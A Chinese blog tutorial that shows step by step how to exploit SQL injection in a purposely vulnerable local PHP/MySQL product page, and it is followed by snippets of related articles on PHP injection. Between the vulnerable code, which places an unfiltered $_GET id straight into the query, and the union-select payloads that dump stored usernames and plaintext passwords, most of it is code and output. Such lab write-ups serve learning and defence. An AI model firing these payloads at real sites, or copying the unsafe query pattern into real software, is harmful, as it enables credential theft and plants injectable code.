一个PHP的SQL注入完整过程

最新推荐文章于 2023-08-14 11:33:02 发布
最新推荐文章于 2023-08-14 11:33:02 发布
阅读量568 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chenxin1017/article/details/51763847
版权
学了SQL注入的一些技能后,以下正对PHP+MYSQL进行SQL注入的简单实践
首先观察两个MYSQL数据表
用户记录表:
CREATE TABLE `php_user` (
`id` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default '',
`password` varchar(20) NOT NULL default '',
`userlevel` char(2) NOT NULL default '0',
PRIMARY KEY (`id`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
INSERT INTO `php_user` VALUES (1, 'seven', 'seven_pwd', '10');
INSERT INTO `php_user` VALUES (2, 'swons', 'swons_pwd', '');
产品记录列表:
CREATE TABLE `php_product` (
`id` int(11) NOT NULL auto_increment,
`name` varchar(100) NOT NULL default '',
`price` float NOT NULL default '0',
`img` varchar(200) NOT NULL default '',
PRIMARY KEY (`id`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
INSERT INTO `php_product` VALUES (1, 'name_1', 12.2, 'images/name_1.jpg');
INSERT INTO `php_product` VALUES (2, 'name_2', 35.25, 'images/name_2.jpg');
以下文件是show_product.php用于显示产品列表。SQL注入也是利用此文件的SQL语句漏洞
<?php
$conn = mysql_connect("localhost", "root", "root");
if(!$conn){
echo "数据库联接错误";
exit;
}
if (!mysql_select_db("phpsql")) {
echo "选择数据库出错" . mysql_error();
exit;
}
$tempID=$_GET['id'];
if($tempID<=0 || !isset($tempID)) $tempID=1;
$sql = "SELECT * FROM php_product WHERE id =$tempID";
echo $sql.'<br>';
$result = mysql_query($sql);
if (!$result) {
echo "查询出错" . mysql_error();
exit;
}
if (mysql_num_rows($result) == 0) {
echo "没有查询结果";
exit;
}
while ($row = mysql_fetch_assoc($result)) {
echo 'ID:'.$row["id"].'<br>';
echo 'name:'.$row["name"].'<br>';
echo 'price:'.$row["price"].'<br>';
echo 'image:'.$row["img"].'<br>';
}
?>
观察此语句:$sql = "SELECT * FROM php_product WHERE id =$tempID";
$tempID是从$_GET得到。我们可以构造这个变量的值,从而达到SQL注入的目的
分别构造以下链接:
得到以下输出
SELECT * FROM php_product WHERE id =1 //当前执行的SQL语句
//得到ID为1的产品资料列表
ID:1
name:name_1
price:12.2
image:images/name_1.jpg
得到输出
SELECT * FROM php_product WHERE id =1 or 1=1 //当前执行的SQL语句
//一共两条产品资料列表
ID:1
name:name_1
price:12.2
image:images/name_1.jpg
ID:2
name:name_2
price:35.25
image:images/name_2.jpg
1和2都得到资料列表输出,证明SQL语句执行成功
3、判断数据表字段数量
http://localhost/phpsql/index.php?id=1  union select 1,1,1,1
得到输出
SELECT * FROM php_product WHERE id =1 union select 1,1,1,1 //当前执行的SQL语句
//一共两条记录,注意第二条的记录为全1,这是union select联合查询的结果。
ID:1
name:name_1
price:12.2
image:images/name_1.jpg
ID:1
name:1
price:1
image:1
4、判断数据表字段类型
http://localhost/phpsql/index.php?id=1  union select char(65),char(65),char(65),char(65)
得到输出
SELECT * FROM php_product WHERE id =1 union select char(65),char(65),char(65),char(65)
ID:1
name:name_1
price:12.2
image:images/name_1.jpg
ID:0
name:A
price:0
image:A
注意第二条记录,如果后面的值等于A,说明这个字段与union查询后面构造的字段类型相符。此时union后面
为char(65),表示字符串类型。经过观察。可以发现name字段和image字段的类型都是字符串类型
5、大功告成,得到我们想要的东西:
http://localhost/phpsql/index.php?id=10000  union select 1,username,1,password from php_user
得到输出:
SELECT * FROM php_product WHERE id =10000 union select 1,username,1,password from php_user
//输出了两条用户资料,name为用户名称,image为用户密码。
ID:1
name:seven
price:1
image:seven_pwd
ID:1
name:swons
price:1
image:swons_pwd
注意URL中的ID=10000是为了不得到产品资料,只得到后面union的查询结果。更具实际情况ID的值有所不同
union的username和password必须放在2和4的位置上。这样才能和前面的select语句匹配。这是union查询
语句的特点
备注:
这个简单的注入方法是更具特定环境的。实际中比这复杂。但是原理是相同的。

chen1017xin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP代码注入PHP代码注入漏洞
cc
03-06 5911
call_user_func()等函数都有调用其他函数的功能,其中的一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用意外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。以call_user_func($fun,$para)函数为例,该函数的第一个参数作为回调函数,后面的参数为回调函数的参数,将$para这个参数传递给$fun这个函数去执行。我们可以利用file_get_contents()函数,写入文件,该函数的作用在于将第二个参数作为内容写入到第一个参数的文件中。
SQL注入php靶场为例)
qq_47632786的博客
02-07 402
一般可用 and 1=1 1=2 /1=3/2-1来判断,当两次输出结果相同时,可判断为字符型注入,若输出结果不同,则为数字型注入。mysql数据库中,information—schema中包含数据库中所有的信息,其中含有tables表,和columns表,两个表中分别包含了所有的表明及列名。上述查询,如上图所示,仅显示一个表名,所以我们需要用 group_concat()确保所有查询信息能放到一行显示出来。③如果是字符型,找到闭合方式,闭合方式多为:’ 、" 、 ’ ) 、 ")。
php sql注入
技术的搬运工
01-16 2170
在应用程序中,为了和用户交互,允许用户提交输入数据,假如应用程序并没有对用户输入数据进行处理,攻击者可以输入一些跟sql语句相关的字符串(一般带有特殊字符)从而让应用程序执行危险的 SQL 操作,导致泄漏机密数据(比如用户信息)或直接修改删除线上的数据。
PHP代码注入PHP语言常见可注入函数以及PHP代码注入漏洞的利用实例
m0_64378913的博客
06-26 6312
目录1 PHP注入概述2 相关函数与语言结构2.1 eval()函数2.2 assert()函数2.3 preg_replace()函数2.4 call_user_func()函数2.5 动态函数`$a($b)`3 总结 1 PHP注入概述 RCE概念:remote command/code execute,远程命令/代码执行。 PHP代码执行:在WEB中,PHP代码执行是指应用程序过滤不严,用户可用通过请求将代码注入到应用中执行。 PHP代码注入SQL注入比较: 其注入思想是类似的,均是构造语句绕过服务
PHP代码审计系列基础文章(一)之SQL注入漏洞篇
FreeBuf_的博客
11-14 1052
在审计SQL注入的时候,我们首先要找到对应的传参点,更要多关注代码中正常SQL语句的规则和过滤情况,最重要的是要闭合正常的SQL语句来,最终执行我们想要执行的SQL语句。
phpsql注入
weixin_58782362的博客
07-25 613
X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,(通常一些网站的防注入功能会记录请求端真实IP地址并写入数据库or某文件[通过修改XXF头可以实现伪造IP]).数据请求格式,有些时候是base64加密,有些时候json加密,base64需要直接进行转换,json是用bp抓包后进行更改,直接在值上面。如果单引号被限制了,可以使用16进制(sql注入中,编码就不用单引号,路径、表名、数据库等)通过A网站的注入点直接拿到B网站的信息,但前提是需要root权限。
php如何实现sql注入
weixin_42577243的博客
01-18 378
SQL注入是通过构造恶意的SQL语句,利用程序中的漏洞,直接在数据库中执行。在 PHP 中,可以使用 PDO 或 mysqli 来预处理 SQL 语句来防止 SQL 注入。这样可以避免在查询中直接插入用户输入的数据。 如果使用 PDO ,可以使用 prepare() 和 execute() 方法来预处理 SQL 语句,并将参数绑定到语句中。 如果使用 mysqli ,可以使用 prepare() ...
phpSQL注入一个
05-04
一个phpSQL注入一个类,参数检查并写入日志,SQL注入日志。
PHPSQL注入攻击[一]
12-17
如果你的站点没有使用严格的用户输入检验,那么非常容易遭到SQL注入攻击。SQL注入攻击通常通过给站点数据库提交不良的数据或查询语句来实现,很可能使数据库中的纪录遭到暴露,更改或被删除。下面来谈谈SQL注入攻击...
phpSQL注入一个类.zip
07-11
分享一个phpSQL注入一个类,参数检查并写入日志,SQL注入日志。
php防止sql注入的方法详解
12-18
在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻击。常见的SQL注入式攻击过程类如:  ⑴ 某个ASP.NET Web应用有一个登录页面,这个...
SQL注入解决方案(PHP为例)
is_scarecrow的博客
06-24 439
sql注入
带你搞懂PHP对象注入详细教程
我的博客,不一样的自我表达
04-17 371
不过需要注意的是,利用场景不限于magic函数,也有一些方式可以在一半的函数中利用这个漏洞,打个比方,一个模块可能定义了一个叫get的函数进行一些敏感的操作,比如访问数据库,这就可能造成sql注入,取决于函数本身的操作。你可以看到,我们创建了一个对象,序列化了它(然后__sleep被调用),之后用序列化对象重建后的对象创建了另一个对象,接着php脚本结束的时候两个对象的__destruct都会被调用。事实上,利用这玩意的可能性有很多种,关键取决于应用程序的流程与,可用的类,与magic函数。
PHP代码审计 -----sql注入漏洞
qq_62344745的博客
04-13 369
SQL注入 大概从08年 ------至今 几乎都是 top10大漏洞中的 第一个了随处可见的,现在可能少点了。我们首先要了解每一种数据库的语法、特性不同的数据库,都有自己的特性,
网络安全——基于联合查询的字符型GET注入
weixin_54055099的博客
09-08 561
SQL注入之基于联合查询的字符GET注入
SQL注入实验详细过程及讲解
2302_78587828的博客
08-14 2040
SQL 注入攻击是通过将恶意的SQL查询或添加语句插入到应用的输入参数中,再在后台SQL服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。
PHP代码注入
zl52111的博客
04-16 1455
1.大致介绍: PHP代码执行注入(web方面)是指应用程序过滤不严格,用户可以通过请求将代码注入到应用中执行。代码执行类似于SQL注入漏洞。代码执行是可以把代码注入到应用中最终由服务器运行它,这样的漏洞如果没有特殊的过滤,相当于直接有了一个web后门的存在。 2.漏洞的危害: 可以通过代码执行漏洞继承web用户权限,执行任意代码。如果具有服务器没有正确配置,用户权限比较高的话,我们可以读写目标服务器的任意文件内容,甚至控制整个网站以及服务器。PHP中有很多函数和语句都会造成PHP 代码执行漏洞。 3.
php sql注入原理,常见sql注入原理详解!
weixin_39576018的博客
03-27 420
/*数据库配置/$config = ['hostname'=>"localhost", 'port'=>"3306", 'username'=>"root",'password'=>'','db'=>'sql'];/*接收参数/$id = $_GET['id']?$_GET['id']:"";if(empty($id)){echo "article is not de...
SQL注入简介及原理
hibugs
03-13 427
数据库信息泄露网页篡改网站被挂马数据库被恶意操作让别人拿到webshell随意添加系统用户。
php一个sql注入漏洞分析工具
最新发布
09-10
为了针对这一问题,我们可以开发一个SQL注入漏洞分析工具,用于检测和分析PHP应用程序中潜在的SQL注入漏洞。这个工具可以包含以下功能: 1. 输入验证和过滤:该工具可以对用户输入参数进行验证和过滤,以防止SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值